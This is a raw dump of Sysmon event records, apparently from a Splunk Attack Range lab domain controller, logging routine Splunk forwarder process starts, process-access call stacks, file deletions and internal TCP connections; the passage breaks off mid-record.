14:11:18.699{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-EA86-6040-704E-00000000AD01}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.699{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA86-6040-704E-00000000AD01}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.700{5ABCFE62-EA86-6040-704E-00000000AD01}6476C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.558{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C00B53B299AB02AC1CF0AFF226F1BB1,SHA256=5A5DB4CF1895A9E34158FA89DA2B66510B6012D4DF432DEEE0CAF7432AD13CB5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.277{5ABCFE62-EA86-6040-6F4E-00000000AD01}65284756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA86-6040-6F4E-00000000AD01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA86-6040-6F4E-00000000AD01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.152{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA86-6040-6F4E-00000000AD01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:18.153{5ABCFE62-EA86-6040-6F4E-00000000AD01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.933{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFF8146828E158BE55E4C55634844F85,SHA256=F1DA029453A98FDDBD3FF58D1F296302CB0638DE9E773617B89240FB487C6EEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.855{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF5B737085D3E9BDC02A36D47E521412,SHA256=EB9A08C8F9C0F74BA267252DEF13C12B75D3711922609FD00274177468C10DB2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.496{5ABCFE62-EA87-6040-714E-00000000AD01}57525940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA87-6040-714E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-EA87-6040-714E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA87-6040-714E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:19.371{5ABCFE62-EA87-6040-714E-00000000AD01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:20.933{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57DD3D757691B21EFF7ED9421A834FCD,SHA256=7C6194408D7BA3A7591566C11D8D3776A49DF0744C5FD18E2ED981ACB67F5F9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:16.020{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60770-false10.0.1.12-8000- 23542300x80000000000000002204701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:21.949{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D239FDEFDAFB767B2C690F7EC47935C1,SHA256=044FDDA5BA1C2FE1C7283334D68354837882A6AF4D08267F1A4C8AC88D55B92F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:22.965{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E03A44EB91DB9870E0E43F0317B2AAA7,SHA256=C407A8733EB495C0D3F65BAB7C50BB107E9CA5F4939D7F03CF5871813A0F9E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:22.246{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=68A5C49F4CA55121DF37F8201B56F7E1,SHA256=2C3053F50B2F3233B0067D21E58C846D75811621AA24357B41824EDCC4C070C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:23.965{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A55ABB8B790DFBC650FCD7AF78C49C,SHA256=8AC8382AC1BBDFD3F0CAC689ED53E6E35028F4EBFF15495809F7E02A0822FCDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:21.066{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60771-false10.0.1.12-8000- 23542300x80000000000000002204705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:11:24.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCE9B0A9E019E4C515D5146D4E413BE4,SHA256=D0CE1FA07DC833CDF104E1F705488F48101562564E498D1CB2AB7FE0D607D34E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034784Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:15.599{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EF7AFD9ECA486A9D257D50F618EB89,SHA256=5CAD62EA42E96658D82F068CE06634A5B57A6CF72240BFECDFE07E6FABDADEBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034785Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:16.765{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 